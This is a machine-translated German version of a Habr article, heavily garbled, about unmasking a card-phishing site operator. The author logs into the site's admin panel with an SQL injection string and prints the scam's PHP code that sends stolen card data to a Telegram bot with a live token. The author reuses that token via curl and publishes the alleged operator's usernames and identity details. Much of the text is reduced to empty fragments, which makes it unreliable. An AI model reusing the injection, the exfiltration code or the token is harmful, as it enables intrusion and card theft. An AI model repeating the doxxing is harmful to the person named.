Geekly articles weekly

Wie habe ich einen Hacker gefangen?

Anmerkung


Jeder von uns kann Opfer eines Angreifers werden, aber manchmal wechseln Raubtier und Beute den Ort.

Dies ist eine kurze Geschichte darüber, wie ein unpassender Einsatz von Technologie zur Offenlegung der Persönlichkeit führen kann. Der Artikel wird sowohl für junge Hacker nützlich sein, die "leichtes Geld" bekommen wollen, als auch für diejenigen, die sie fangen wollen.

Einführung


An einem Februarabend war ich damit beschäftigt, einen Ort für ein romantisches Date mit meinem Geliebten zu suchen. Nach einiger Zeit wurde ich auf die Website milleniumfilm.ru aufmerksam , die derzeit nicht verfügbar ist. Die Website bot Verleihdienste für kleine Kinosäle zur privaten Besichtigung. Schöne Bilder, vernünftige Preise, es gibt Online-Support, aber eines: Es wurde vorgeschlagen, Bankkartendaten auf einer ungeschützten Seite derselben Domain einzugeben. Vorsichtig schrieb ich an den technischen Support der Website, und die Betrüger brauchten nicht lange, um zu warten. Als sie merkten, dass ich technisch kompetent genug war, schickten sie mir drei Briefe. Natürlich machen Betrüger keinen Sinn, Zeit mit mir zu verschwenden, aber warum so unhöflich? - In jeder Situation müssen Sie ein Mann bleiben.

Bewertungen zu Websites desselben Plans finden Sie hier: zhaloba-online.ru . Einige von ihnen arbeiten sogar noch.

Hacken


Ich fühlte mich allgemein ungerecht, um die Identität des Angreifers festzustellen und seine Aktivitäten zu unterdrücken, und begann, die Website auf Schwachstellen zu untersuchen. Die erste Adresse, die ich mit einem Finger in den Himmel zeigte, führte mich zum Admin-Panel , in dem ich höflich gebeten wurde, „Login“ und „Password“ anzugeben.

Screenshot

Der erste Versuch der SQL-Injection Das erste Passwort, das mir in den Sinn kam

1' or '1

.

.
, .

Gelloiss.ru . « » — : , , , cvc2 .

. .

.
, 3D-secure, . , . , 3D-secure . , , .

« » - . , php-shell. /images/, login.php. , .

.

telegram.php.

.
$ cat telegram.php
<?
function send_mess($text) {
  $token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
  $mess = $text;
  $chat = "-302359340";
  /*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
  file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}

PHP - send_mess. , - , .

grep
./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A  : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21:  send_mess(": ".$sum."%0D%0A  : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);

, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram- ).

gelloiss.ru

, , .

curl
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}

username — «gelloiss».


: ! : «gelloiss», «ura7887», , «Gelloiss.ru», skype «ura7887».

.

: vk.com , 6 , 14 .

.

anime.anidub.com.

.

blackhacker.ru, .

.


telegram


, Gelloiss.ru telegram, telegram- . , telegram- .

shell
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8  -

telegram : a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 .

telegram


, . , 100 , +100.

, «». « » .



, . : 3 - 13 . , - , 2 . , , . , moneyonline.world.

Update 2019-04-21: gelloiss , , , telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Source: https://habr.com/ru/post/de448810/

More articles:


All Articles